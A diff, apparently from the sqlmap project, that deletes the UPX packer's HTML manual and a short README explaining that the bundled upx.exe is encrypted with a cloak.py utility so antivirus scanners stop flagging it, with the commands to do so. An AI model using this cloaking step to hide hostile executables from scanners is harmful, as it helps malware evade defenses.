-      * win32/pe (exe and dll)
-      * arm/pe (exe and dll)
-      * linux/elfamd64
-      * linux/elfppc32
-      * mach/elfppc32</pre>
-<pre>
-  - portable: UPX is written in portable endian-neutral C++</pre>
-<pre>
-  - extendable: because of the class layout it's very easy to support
-      new executable formats or add new compression algorithms</pre>
-<pre>
-  - free: UPX can be distributed and used freely. And from version 0.99
-      the full source code of UPX is released under the GNU General Public
-      License (GPL) !</pre>
-<p>You probably understand now why we call <strong>UPX</strong> the ``<em>ultimate</em>''
-executable packer.</p>
-<p>
-</p>
-<hr />
-<h1><a name="commands">COMMANDS</a></h1>
-<p>
-</p>
-<h2><a name="compress">Compress</a></h2>
-<p>This is the default operation, eg. <strong>upx yourfile.exe</strong> will compress the file
-specified on the command line.</p>
-<p>
-</p>
-<h2><a name="decompress">Decompress</a></h2>
-<p>All <strong>UPX</strong> supported file formats can be unpacked using the <strong>-d</strong> switch, eg.
-<strong>upx -d yourfile.exe</strong> will uncompress the file you've just compressed.</p>
-<p>
-</p>
-<h2><a name="test">Test</a></h2>
-<p>The <strong>-t</strong> command tests the integrity of the compressed and uncompressed
-data, eg. <strong>upx -t yourfile.exe</strong> check whether your file can be safely
-decompressed. Note, that this command doesn't check the whole file, only
-the part that will be uncompressed during program execution. This means
-that you should not use this command instead of a virus checker.</p>
-<p>
-</p>
-<h2><a name="list">List</a></h2>
-<p>The <strong>-l</strong> command prints out some information about the compressed files
-specified on the command line as parameters, eg <strong>upx -l yourfile.exe</strong>
-shows the compressed / uncompressed size and the compression ratio of
-<em>yourfile.exe</em>.</p>
-<p>
-</p>
-<hr />
-<h1><a name="options">OPTIONS</a></h1>
-<p><strong>-q</strong>: be quiet, suppress warnings</p>
-<p><strong>-q -q</strong> (or <strong>-qq</strong>): be very quiet, suppress errors</p>
-<p><strong>-q -q -q</strong> (or <strong>-qqq</strong>): produce no output at all</p>
-<p><strong>--help</strong>: prints the help</p>
-<p><strong>--version</strong>: print the version of <strong>UPX</strong></p>
-<p><strong>--exact</strong>: when compressing, require to be able to get a byte-identical file
-after decompression with option <strong>-d</strong>. [NOTE: this is work in progress and is
-not supported for all formats yet. If you do care, as a workaround you can
-compress and then decompress your program a first time - any further
-compress-decompress steps should then yield byte-identical results
-as compared to the first decompressed version.]</p>
-<p>[ ...to be written... - type `<strong>upx --help</strong>' for now ]</p>
-<p>
-</p>
-<hr />
-<h1><a name="compression_levels___tuning">COMPRESSION LEVELS &amp; TUNING</a></h1>
-<p><strong>UPX</strong> offers ten different compression levels from <strong>-1</strong> to <strong>-9</strong>,
-and <strong>--best</strong>.  The default compression level is <strong>-8</strong> for files
-smaller than 512 KiB, and <strong>-7</strong> otherwise.</p>
-<ul>
-<li>
-<p>Compression levels 1, 2 and 3 are pretty fast.</p>
-</li>
-<li>
-<p>Compression levels 4, 5 and 6 achieve a good time/ratio performance.</p>
-</li>
-<li>
-<p>Compression levels 7, 8 and 9 favor compression ratio over speed.</p>
-</li>
-<li>
-<p>Compression level <strong>--best</strong> may take a long time.</p>
-</li>
-</ul>
-<p>Note that compression level <strong>--best</strong> can be somewhat slow for large
-files, but you definitely should use it when releasing a final version
-of your program.</p>
-<p>Quick info for achieving the best compression ratio:</p>
-<ul>
-<li>
-<p>Try <strong>upx --brute myfile.exe</strong> or even <strong>upx --ultra-brute myfile.exe</strong>.</p>
-</li>
-<li>
-<p>Try if <strong>--overlay=strip</strong> works.</p>
-</li>
-<li>
-<p>For win32/pe programs there's <strong>--strip-relocs=0</strong>. See notes below.</p>
-</li>
-</ul>
-<p>
-</p>
-<hr />
-<h1><a name="overlay_handling_options">OVERLAY HANDLING OPTIONS</a></h1>
-<p>Info: An ``overlay'' means auxiliary data attached after the logical end of
-an executable, and it often contains application specific data
-(this is a common practice to avoid an extra data file, though
-it would be better to use resource sections).</p>
-<p><strong>UPX</strong> handles overlays like many other executable packers do: it simply
-copies the overlay after the compressed image. This works with some
-files, but doesn't work with others, depending on how an application
-actually accesses this overlayed data.</p>
-<pre>
-  --overlay=copy    Copy any extra data attached to the file. [DEFAULT]</pre>
-<pre>
-  --overlay=strip   Strip any overlay from the program instead of
-                    copying it. Be warned, this may make the compressed
-                    program crash or otherwise unusable.</pre>
-<pre>
-  --overlay=skip    Refuse to compress any program which has an overlay.</pre>
-<p>
-</p>
-<hr />
-<h1><a name="environment">ENVIRONMENT</a></h1>
-<p>The environment variable <strong>UPX</strong> can hold a set of default
-options for <strong>UPX</strong>. These options are interpreted first and
-can be overwritten by explicit command line parameters.
-For example:</p>
-<pre>
-    for DOS/Windows:   set UPX=-9 --compress-icons#0
-    for sh/ksh/zsh:    UPX=&quot;-9 --compress-icons=0&quot;; export UPX
-    for csh/tcsh:      setenv UPX &quot;-9 --compress-icons=0&quot;</pre>
-<p>Under DOS/Windows you must use '#' instead of '=' when setting the
-environment variable because of a COMMAND.COM limitation.</p>
-<p>Not all of the options are valid in the environment variable -
-<strong>UPX</strong> will tell you.</p>
-<p>You can explicitly use the <strong>--no-env</strong> option to ignore the
-environment variable.</p>
-<p>
-</p>
-<hr />
-<h1><a name="notes_for_the_supported_executable_formats">NOTES FOR THE SUPPORTED EXECUTABLE FORMATS</a></h1>
-<p>
-</p>
-<h2><a name="notes_for_atari_tos">NOTES FOR ATARI/TOS</a></h2>
-<p>This is the executable format used by the Atari ST/TT, a Motorola 68000
-based personal computer which was popular in the late '80s. Support
-of this format is only because of nostalgic feelings of one of
-the authors and serves no practical purpose :-).
-See <a href="http://www.freemint.de">http://www.freemint.de</a> for more info.</p>
-<p>Packed programs will be byte-identical to the original after uncompression.
-All debug information will be stripped, though.</p>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<p>
-</p>
-<h2><a name="notes_for_bvmlinuz_i386">NOTES FOR BVMLINUZ/I386</a></h2>
-<p>Same as vmlinuz/i386.</p>
-<p>
-</p>
-<h2><a name="notes_for_dos_com">NOTES FOR DOS/COM</a></h2>
-<p>Obviously <strong>UPX</strong> won't work with executables that want to read data from
-themselves (like some commandline utilities that ship with Win95/98/ME).</p>
-<p>Compressed programs only work on a 286+.</p>
-<p>Packed programs will be byte-identical to the original after uncompression.</p>
-<p>Maximum uncompressed size: ~65100 bytes.</p>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --8086              Create an executable that works on any 8086 CPU.</pre>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<pre>
-  --all-filters       Compress the program several times, using all
-                      available preprocessing filters. This may improve
-                      the compression ratio in some cases, but usually
-                      the default filter gives the best results anyway.</pre>
-<p>
-</p>
-<h2><a name="notes_for_dos_exe">NOTES FOR DOS/EXE</a></h2>
-<p>dos/exe stands for all ``normal'' 16-bit DOS executables.</p>
-<p>Obviously <strong>UPX</strong> won't work with executables that want to read data from
-themselves (like some command line utilities that ship with Win95/98/ME).</p>
-<p>Compressed programs only work on a 286+.</p>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --8086              Create an executable that works on any 8086 CPU.</pre>
-<pre>
-  --no-reloc          Use no relocation records in the exe header.</pre>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<p>
-</p>
-<h2><a name="notes_for_dos_sys">NOTES FOR DOS/SYS</a></h2>
-<p>Compressed programs only work on a 286+.</p>
-<p>Packed programs will be byte-identical to the original after uncompression.</p>
-<p>Maximum uncompressed size: ~65350 bytes.</p>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --8086              Create an executable that works on any 8086 CPU.</pre>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<pre>
-  --all-filters       Compress the program several times, using all
-                      available preprocessing filters. This may improve
-                      the compression ratio in some cases, but usually
-                      the default filter gives the best results anyway.</pre>
-<p>
-</p>
-<h2><a name="notes_for_djgpp2_coff">NOTES FOR DJGPP2/COFF</a></h2>
-<p>First of all, it is recommended to use <strong>UPX</strong> *instead* of <strong>strip</strong>. strip has
-the very bad habit of replacing your stub with its own (outdated) version.
-Additionally <strong>UPX</strong> corrects a bug/feature in strip v2.8.x: it
-will fix the 4 KiB alignment of the stub.</p>
-<p><strong>UPX</strong> includes the full functionality of stubify. This means it will
-automatically stubify your COFF files. Use the option <strong>--coff</strong> to
-disable this functionality (see below).</p>
-<p><strong>UPX</strong> automatically handles Allegro packfiles.</p>
-<p>The DLM format (a rather exotic shared library extension) is not supported.</p>
-<p>Packed programs will be byte-identical to the original after uncompression.
-All debug information and trailing garbage will be stripped, though.</p>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --coff              Produce COFF output instead of EXE. By default
-                      UPX keeps your current stub.</pre>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<pre>
-  --all-filters       Compress the program several times, using all
-                      available preprocessing filters. This may improve
-                      the compression ratio in some cases, but usually
-                      the default filter gives the best results anyway.</pre>
-<p>
-</p>
-<h2><a name="notes_for_linux__general_">NOTES FOR LINUX [general]</a></h2>
-<p>Introduction</p>
-<pre>
-  Linux/386 support in UPX consists of 3 different executable formats,
-  one optimized for ELF executables (&quot;linux/elf386&quot;), one optimized
-  for shell scripts (&quot;linux/sh386&quot;), and one generic format
-  (&quot;linux/386&quot;).</pre>
-<pre>
-  We will start with a general discussion first, but please
-  also read the relevant docs for each of the individual formats.</pre>
-<pre>
-  Also, there is special support for bootable kernels - see the
-  description of the vmlinuz/386 format.</pre>
-<p>General user's overview</p>
-<pre>
-  Running a compressed executable program trades less space on a
-  ``permanent'' storage medium (such as a hard disk, floppy disk,
-  CD-ROM, flash memory, EPROM, etc.) for more space in one or more
-  ``temporary'' storage media (such as RAM, swap space, /tmp, etc.).
-  Running a compressed executable also requires some additional CPU
-  cycles to generate the compressed executable in the first place,
-  and to decompress it at each invocation.</pre>
-<pre>
-  How much space is traded?  It depends on the executable, but many
-  programs save 30% to 50% of permanent disk space.  How much CPU
-  overhead is there?  Again, it depends on the executable, but
-  decompression speed generally is at least many megabytes per second,
-  and frequently is limited by the speed of the underlying disk
-  or network I/O.</pre>
-<pre>
-  Depending on the statistics of usage and access, and the relative
-  speeds of CPU, RAM, swap space, /tmp, and file system storage, then
-  invoking and running a compressed executable can be faster than
-  directly running the corresponding uncompressed program.
-  The operating system might perform fewer expensive I/O operations
-  to invoke the compressed program.  Paging to or from swap space
-  or /tmp might be faster than paging from the general file system.
-  ``Medium-sized'' programs which access about 1/3 to 1/2 of their
-  stored program bytes can do particularly well with compression.
-  Small programs tend not to benefit as much because the absolute
-  savings is less.  Big programs tend not to benefit proportionally
-  because each invocation may use only a small fraction of the program,
-  yet UPX decompresses the entire program before invoking it.
-  But in environments where disk or flash memory storage is limited,
-  then compression may win anyway.</pre>
-<pre>
-  Currently, executables compressed by UPX do not share RAM at runtime
-  in the way that executables mapped from a file system do.  As a
-  result, if the same program is run simultaneously by more than one
-  process, then using the compressed version will require more RAM and/or
-  swap space.  So, shell programs (bash, csh, etc.)  and ``make''
-  might not be good candidates for compression.</pre>
-<pre>
-  UPX recognizes three executable formats for Linux: Linux/elf386,
-  Linux/sh386, and Linux/386.  Linux/386 is the most generic format;
-  it accommodates any file that can be executed.  At runtime, the UPX
-  decompression stub re-creates in /tmp a copy of the original file,
-  and then the copy is (re-)executed with the same arguments.
-  ELF binary executables prefer the Linux/elf386 format by default,
-  because UPX decompresses them directly into RAM, uses only one
-  exec, does not use space in /tmp, and does not use /proc.
-  Shell scripts where the underlying shell accepts a ``-c'' argument
-  can use the Linux/sh386 format.  UPX decompresses the shell script
-  into low memory, then maps the shell and passes the entire text of the
-  script as an argument with a leading ``-c''.</pre>
-<p>General benefits:</p>
-<pre>
-  - UPX can compress all executables, be it AOUT, ELF, libc4, libc5,
-    libc6, Shell/Perl/Python/... scripts, standalone Java .class
-    binaries, or whatever...
-    All scripts and programs will work just as before.</pre>
-<pre>
-  - Compressed programs are completely self-contained. No need for
-    any external program.</pre>
-<pre>
-  - UPX keeps your original program untouched. This means that
-    after decompression you will have a byte-identical version,
-    and you can use UPX as a file compressor just like gzip.
-    [ Note that UPX maintains a checksum of the file internally,
-      so it is indeed a reliable alternative. ]</pre>
-<pre>
-  - As the stub only uses syscalls and isn't linked against libc it
-    should run under any Linux configuration that can run ELF
-    binaries.</pre>
-<pre>
-  - For the same reason compressed executables should run under
-    FreeBSD and other systems which can run Linux binaries.
-    [ Please send feedback on this topic ]</pre>
-<p>General drawbacks:</p>
-<pre>
-  - It is not advisable to compress programs which usually have many
-    instances running (like `sh' or `make') because the common segments of
-    compressed programs won't be shared any longer between different
-    processes.</pre>
-<pre>
-  - `ldd' and `size' won't show anything useful because all they
-    see is the statically linked stub.  Since version 0.82 the section
-    headers are stripped from the UPX stub and `size' doesn't even
-    recognize the file format.  The file patches/patch-elfcode.h has a
-    patch to fix this bug in `size' and other programs which use GNU BFD.</pre>
-<p>General notes:</p>
-<pre>
-  - As UPX leaves your original program untouched it is advantageous
-    to strip it before compression.</pre>
-<pre>
-  - If you compress a script you will lose platform independence -
-    this could be a problem if you are using NFS mounted disks.</pre>
-<pre>
-  - Compression of suid, guid and sticky-bit programs is rejected
-    because of possible security implications.</pre>
-<pre>
-  - For the same reason there is no sense in making any compressed
-    program suid.</pre>
-<pre>
-  - Obviously UPX won't work with executables that want to read data
-    from themselves. E.g., this might be a problem for Perl scripts
-    which access their __DATA__ lines.</pre>
-<pre>
-  - In case of internal errors the stub will abort with exitcode 127.
-    Typical reasons for this to happen are that the program has somehow
-    been modified after compression.
-    Running `strace -o strace.log compressed_file' will tell you more.</pre>
-<p>
-</p>
-<h2><a name="notes_for_linux_elf386">NOTES FOR LINUX/ELF386</a></h2>
-<p>Please read the general Linux description first.</p>
-<p>The linux/elf386 format decompresses directly into RAM,
-uses only one exec, does not use space in /tmp,
-and does not use /proc.</p>
-<p>Linux/elf386 is automatically selected for Linux ELF executables.</p>
-<p>Packed programs will be byte-identical to the original after uncompression.</p>
-<p>How it works:</p>
-<pre>
-  For ELF executables, UPX decompresses directly to memory, simulating
-  the mapping that the operating system kernel uses during exec(),
-  including the PT_INTERP program interpreter (if any).
-  The brk() is set by a special PT_LOAD segment in the compressed
-  executable itself.  UPX then wipes the stack clean except for
-  arguments, environment variables, and Elf_auxv entries (this is
-  required by bugs in the startup code of /lib/ld-linux.so as of
-  May 2000), and transfers control to the program interpreter or
-  the e_entry address of the original executable.</pre>
-<pre>
-  The UPX stub is about 1700 bytes long, partly written in assembler
-  and only uses kernel syscalls. It is not linked against any libc.</pre>
-<p>Specific drawbacks:</p>
-<pre>
-  - For linux/elf386 and linux/sh386 formats, you will be relying on
-    RAM and swap space to hold all of the decompressed program during
-    the lifetime of the process.  If you already use most of your swap
-    space, then you may run out.  A system that is &quot;out of memory&quot;
-    can become fragile.  Many programs do not react gracefully when
-    malloc() returns 0.  With newer Linux kernels, the kernel
-    may decide to kill some processes to regain memory, and you
-    may not like the kernel's choice of which to kill.  Running
-    /usr/bin/top is one way to check on the usage of swap space.</pre>
-<p>Extra options available for this executable format:</p>
-<pre>
-  (none)</pre>
-<p>
-</p>
-<h2><a name="notes_for_linux_sh386">NOTES FOR LINUX/SH386</a></h2>
-<p>Please read the general Linux description first.</p>
-<p>Shell scripts where the underling shell accepts a ``-c'' argument
-can use the Linux/sh386 format.  <strong>UPX</strong> decompresses the shell script
-into low memory, then maps the shell and passes the entire text of the
-script as an argument with a leading ``-c''.
-It does not use space in /tmp, and does not use /proc.</p>
-<p>Linux/sh386 is automatically selected for shell scripts that
-use a known shell.</p>
-<p>Packed programs will be byte-identical to the original after uncompression.</p>
-<p>How it works:</p>
-<pre>
-  For shell script executables (files beginning with &quot;#!/&quot; or &quot;#! /&quot;)
-  where the shell is known to accept &quot;-c &lt;command&gt;&quot;, UPX decompresses
-  the file into low memory, then maps the shell (and its PT_INTERP),
-  and passes control to the shell with the entire decompressed file
-  as the argument after &quot;-c&quot;.  Known shells are sh, ash, bash, bsh, csh,
-  ksh, tcsh, pdksh.  Restriction: UPX cannot use this method
-  for shell scripts which use the one optional string argument after
-  the shell name in the script (example: &quot;#! /bin/sh option3\n&quot;.)</pre>
-<pre>
-  The UPX stub is about 1700 bytes long, partly written in assembler
-  and only uses kernel syscalls. It is not linked against any libc.</pre>
-<p>Specific drawbacks:</p>
-<pre>
-  - For linux/elf386 and linux/sh386 formats, you will be relying on
-    RAM and swap space to hold all of the decompressed program during
-    the lifetime of the process.  If you already use most of your swap
-    space, then you may run out.  A system that is &quot;out of memory&quot;
-    can become fragile.  Many programs do not react gracefully when
-    malloc() returns 0.  With newer Linux kernels, the kernel
-    may decide to kill some processes to regain memory, and you
-    may not like the kernel's choice of which to kill.  Running
-    /usr/bin/top is one way to check on the usage of swap space.</pre>
-<p>Extra options available for this executable format:</p>
-<pre>
-  (none)</pre>
-<p>
-</p>
-<h2><a name="notes_for_linux_386">NOTES FOR LINUX/386</a></h2>
-<p>Please read the general Linux description first.</p>
-<p>The generic linux/386 format decompresses to /tmp and needs
-/proc file system support. It starts the decompressed program
-via the <code>execve()</code> syscall.</p>
-<p>Linux/386 is only selected if the specialized linux/elf386
-and linux/sh386 won't recognize a file.</p>
-<p>Packed programs will be byte-identical to the original after uncompression.</p>
-<p>How it works:</p>
-<pre>
-  For files which are not ELF and not a script for a known &quot;-c&quot; shell,
-  UPX uses kernel execve(), which first requires decompressing to a
-  temporary file in the file system.  Interestingly -
-  because of the good memory management of the Linux kernel - this
-  often does not introduce a noticeable delay, and in fact there
-  will be no disk access at all if you have enough free memory as
-  the entire process takes places within the file system buffers.</pre>
-<pre>
-  A compressed executable consists of the UPX stub and an overlay
-  which contains the original program in a compressed form.</pre>
-<pre>
-  The UPX stub is a statically linked ELF executable and does
-  the following at program startup:</pre>
-<pre>
-    1) decompress the overlay to a temporary location in /tmp
-    2) open the temporary file for reading
-    3) try to delete the temporary file and start (execve)
-       the uncompressed program in /tmp using /proc/&lt;pid&gt;/fd/X as
-       attained by step 2)
-    4) if that fails, fork off a subprocess to clean up and
-       start the program in /tmp in the meantime</pre>
-<pre>
-  The UPX stub is about 1700 bytes long, partly written in assembler
-  and only uses kernel syscalls. It is not linked against any libc.</pre>
-<p>Specific drawbacks:</p>
-<pre>
-  - You need additional free disk space for the uncompressed program
-    in your /tmp directory. This program is deleted immediately after
-    decompression, but you still need it for the full execution time
-    of the program.</pre>
-<pre>
-  - You must have /proc file system support as the stub wants to open
-    /proc/&lt;pid&gt;/exe and needs /proc/&lt;pid&gt;/fd/X. This also means that you
-    cannot compress programs that are used during the boot sequence
-    before /proc is mounted.</pre>
-<pre>
-  - Utilities like `top' will display numerical values in the process
-    name field. This is because Linux computes the process name from
-    the first argument of the last execve syscall (which is typically
-    something like /proc/&lt;pid&gt;/fd/3).</pre>
-<pre>
-  - Because of temporary decompression to disk the decompression speed
-    is not as fast as with the other executable formats. Still, I can see
-    no noticeable delay when starting programs like my ~3 MiB emacs (which
-    is less than 1 MiB when compressed :-).</pre>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --force-execve      Force the use of the generic linux/386 &quot;execve&quot;
-                      format, i.e. do not try the linux/elf386 and
-                      linux/sh386 formats.</pre>
-<p>
-</p>
-<h2><a name="notes_for_ps1_exe">NOTES FOR PS1/EXE</a></h2>
-<p>This is the executable format used by the Sony PlayStation (PSone),
-a Mips R3000 based gaming console which is popular since the late '90s.
-Support of this format is very similar to the Atari one, because of
-nostalgic feelings of one of the authors.</p>
-<p>Packed programs will be byte-identical to the original after uncompression,
-until further notice.</p>
-<p>Maximum uncompressed size: ~1.89 / ~7.60 MiB.</p>
-<p>Notes:</p>
-<pre>
-  - UPX creates as default a suitable executable for CD-Mastering
-    and console transfer. For a CD-Master main executable you could also try
-    the special option &quot;--boot-only&quot; as described below.
-    It has been reported that upx packed executables are fully compatible with
-    the Sony PlayStation 2 (PS2, PStwo) and Sony PlayStation Portable (PSP) in
-    Sony PlayStation (PSone) emulation mode.</pre>
-<pre>
-  - Normally the packed files use the same memory areas like the uncompressed
-    versions, so they will not override other memory areas while unpacking.
-    If this isn't possible UPX will abort showing a 'packed data overlap'
-    error. With the &quot;--force&quot; option UPX will relocate the loading address
-    for the packed file, but this isn't a real problem if it is a single or
-    the main executable.</pre>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<pre>
-  --8-bit             Uses 8 bit size compression [default: 32 bit]</pre>
-<pre>
-  --8mib-ram          PSone has 8 MiB ram available [default: 2 MiB]</pre>
-<pre>
-  --boot-only         This format is for main exes and CD-Mastering only !
-                      It may slightly improve the compression ratio,
-                      decompression routines are faster than default ones.
-                      But it cannot be used for console transfer !</pre>
-<pre>
-  --no-align          This option disables CD mode 2 data sector format
-                      alignment. May slightly improves the compression ratio,
-                      but the compressed executable will not boot from a CD.
-                      Use it for console transfer only !</pre>
-<p>
-</p>
-<h2><a name="notes_for_rtm32_pe_and_arm_pe">NOTES FOR RTM32/PE and ARM/PE</a></h2>
-<p>Same as win32/pe.</p>
-<p>
-</p>
-<h2><a name="notes_for_tmt_adam">NOTES FOR TMT/ADAM</a></h2>
-<p>This format is used by the TMT Pascal compiler - see <a href="http://www.tmt.com/">http://www.tmt.com/</a> .</p>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<pre>
-  --all-filters       Compress the program several times, using all
-                      available preprocessing filters. This may improve
-                      the compression ratio in some cases, but usually
-                      the default filter gives the best results anyway.</pre>
-<p>
-</p>
-<h2><a name="notes_for_vmlinuz_386">NOTES FOR VMLINUZ/386</a></h2>
-<p>The vmlinuz/386 and bvmlinuz/386 formats take a gzip-compressed
-bootable Linux kernel image (``vmlinuz'', ``zImage'', ``bzImage''),
-gzip-decompress it and re-compress it with the <strong>UPX</strong> compression method.</p>
-<p>vmlinuz/386 is completely unrelated to the other Linux executable
-formats, and it does not share any of their drawbacks.</p>
-<p>Notes:</p>
-<pre>
-  - Be sure that &quot;vmlinuz/386&quot; or &quot;bvmlinuz/386&quot; is displayed
-  during compression - otherwise a wrong executable format
-  may have been used, and the kernel won't boot.</pre>
-<p>Benefits:</p>
-<pre>
-  - Better compression (but note that the kernel was already compressed,
-  so the improvement is not as large as with other formats).
-  Still, the bytes saved may be essential for special needs like
-  boot disks.</pre>
-<pre>
-     For example, this is what I get for my 2.2.16 kernel:
-        1589708  vmlinux
-         641073  bzImage        [original]
-         560755  bzImage.upx    [compressed by &quot;upx -9&quot;]</pre>
-<pre>
-  - Much faster decompression at kernel boot time (but kernel
-    decompression speed is not really an issue these days).</pre>
-<p>Drawbacks:</p>
-<pre>
-  (none)</pre>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<pre>
-  --all-filters       Compress the program several times, using all
-                      available preprocessing filters. This may improve
-                      the compression ratio in some cases, but usually
-                      the default filter gives the best results anyway.</pre>
-<p>
-</p>
-<h2><a name="notes_for_watcom_le">NOTES FOR WATCOM/LE</a></h2>
-<p><strong>UPX</strong> has been successfully tested with the following extenders:
-  DOS4G, DOS4GW, PMODE/W, DOS32a, CauseWay.
-  The WDOS/X extender is partly supported (for details
-  see the file bugs BUGS).</p>
-<p>DLLs and the LX format are not supported.</p>
-<p>Extra options available for this executable format:</p>
-<pre>
-  --le                Produce an unbound LE output instead of
-                      keeping the current stub.</pre>
-<p>
-</p>
-<h2><a name="notes_for_win32_pe">NOTES FOR WIN32/PE</a></h2>
-<p>The PE support in <strong>UPX</strong> is quite stable now, but probably there are
-still some incompatibilities with some files.</p>
-<p>Because of the way <strong>UPX</strong> (and other packers for this format) works, you
-can see increased memory usage of your compressed files because the whole
-program is loaded into memory at startup.
-If you start several instances of huge compressed programs you're
-wasting memory because the common segments of the program won't
-get shared across the instances.
-On the other hand if you're compressing only smaller programs, or
-running only one instance of larger programs, then this penalty is
-smaller, but it's still there.</p>
-<p>If you're running executables from network, then compressed programs
-will load faster, and require less bandwidth during execution.</p>
-<p>DLLs are supported. But UPX compressed DLLs can not share common data and
-code when they got used by multiple applications. So compressing msvcrt.dll
-is a waste of memory, but compressing the dll plugins of a particular
-application may be a better idea.</p>
-<p>Screensavers are supported, with the restriction that the filename
-must end with ``.scr'' (as screensavers are handled slightly different
-than normal exe files).</p>
-<p>UPX compressed PE files have some minor memory overhead (usually in the
-10 - 30 KiB range) which can be seen by specifying the ``-i'' command
-line switch during compression.</p>
-<p>Extra options available for this executable format:</p>
-<pre>
- --compress-exports=0 Don't compress the export section.
-                      Use this if you plan to run the compressed
-                      program under Wine.
- --compress-exports=1 Compress the export section. [DEFAULT]
-                      Compression of the export section can improve the
-                      compression ratio quite a bit but may not work
-                      with all programs (like winword.exe).
-                      UPX never compresses the export section of a DLL
-                      regardless of this option.</pre>
-<pre>
-  --compress-icons=0  Don't compress any icons.
-  --compress-icons=1  Compress all but the first icon.
-  --compress-icons=2  Compress all icons which are not in the
-                      first icon directory. [DEFAULT]
-  --compress-icons=3  Compress all icons.</pre>
-<pre>
-  --compress-resources=0  Don't compress any resources at all.</pre>
-<pre>
-  --keep-resource=list Don't compress resources specified by the list.
-                      The members of the list are separated by commas.
-                      A list member has the following format: I&lt;type[/name]&gt;.
-                      I&lt;Type&gt; is the type of the resource. Standard types
-                      must be specified as decimal numbers, user types can be
-                      specified by decimal IDs or strings. I&lt;Name&gt; is the
-                      identifier of the resource. It can be a decimal number
-                      or a string. For example:</pre>
-<pre>
-                      --keep-resource=2/MYBITMAP,5,6/12345</pre>
-<pre>
-                      UPX won't compress the named bitmap resource &quot;MYBITMAP&quot;,
-                      it leaves every dialog (5) resource uncompressed, and
-                      it won't touch the string table resource with identifier
-                      12345.</pre>
-<pre>
-  --force             Force compression even when there is an
-                      unexpected value in a header field.
-                      Use with care.</pre>
-<pre>
-  --strip-relocs=0    Don't strip relocation records.
-  --strip-relocs=1    Strip relocation records. [DEFAULT]
-                      This option only works on executables with base
-                      address greater or equal to 0x400000. Usually the
-                      compressed files becomes smaller, but some files
-                      may become larger. Note that the resulting file will
-                      not work under Windows 3.x (Win32s).
-                      UPX never strips relocations from a DLL
-                      regardless of this option.</pre>
-<pre>
-  --all-methods       Compress the program several times, using all
-                      available compression methods. This may improve
-                      the compression ratio in some cases, but usually
-                      the default method gives the best results anyway.</pre>
-<pre>
-  --all-filters       Compress the program several times, using all
-                      available preprocessing filters. This may improve
-                      the compression ratio in some cases, but usually
-                      the default filter gives the best results anyway.</pre>
-<p>
-</p>
-<hr />
-<h1><a name="diagnostics">DIAGNOSTICS</a></h1>
-<p>Exit status is normally 0; if an error occurs, exit status
-is 1. If a warning occurs, exit status is 2.</p>
-<p><strong>UPX</strong>'s diagnostics are intended to be self-explanatory.</p>
-<p>
-</p>
-<hr />
-<h1><a name="bugs">BUGS</a></h1>
-<p>Please report all bugs immediately to the authors.</p>
-<p>
-</p>
-<hr />
-<h1><a name="authors">AUTHORS</a></h1>
-<pre>
- Markus F.X.J. Oberhumer &lt;markus@oberhumer.com&gt;
- <a href="http://www.oberhumer.com">http://www.oberhumer.com</a></pre>
-<pre>
- Laszlo Molnar &lt;ml1050@users.sourceforge.net&gt;</pre>
-<pre>
- John F. Reiser &lt;jreiser@BitWagon.com&gt;</pre>
-<pre>
- Jens Medoch &lt;jssg@users.sourceforge.net&gt;</pre>
-<p>
-</p>
-<hr />
-<h1><a name="copyright">COPYRIGHT</a></h1>
-<p>Copyright (C) 1996-2008 Markus Franz Xaver Johannes Oberhumer</p>
-<p>Copyright (C) 1996-2008 Laszlo Molnar</p>
-<p>Copyright (C) 2000-2008 John F. Reiser</p>
-<p>Copyright (C) 2002-2008 Jens Medoch</p>
-<p>This program may be used freely, and you are welcome to
-redistribute it under certain conditions.</p>
-<p>This program is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-<strong>UPX License Agreement</strong> for more details.</p>
-<p>You should have received a copy of the UPX License Agreement along
-with this program; see the file LICENSE. If not, visit the UPX home page.</p>
-
-</body>
-
-</html>

lib/contrib/upx/windows/README.txt

@@ -1,11 +0,0 @@
-Due to the anti-virus positive detection of executable stored inside this
-folder,  we needed to somehow circumvent this. As from the plain sqlmap
-users perspective nothing has to be done prior to its usage by sqlmap, but
-if you want to have access to the original executable use the decrypt
-functionality of the ../../../../extra/cloak/cloak.py utility.
-
-To prepare the executable to the cloaked form use this command:
-python ../../../../extra/cloak/cloak.py -i upx.exe
-
-To get back the original executable use this:
-python ../../../../extra/cloak/cloak.py -d -i upx.exe_

lib/controller/__init__.py

@@ -1,25 +1,8 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
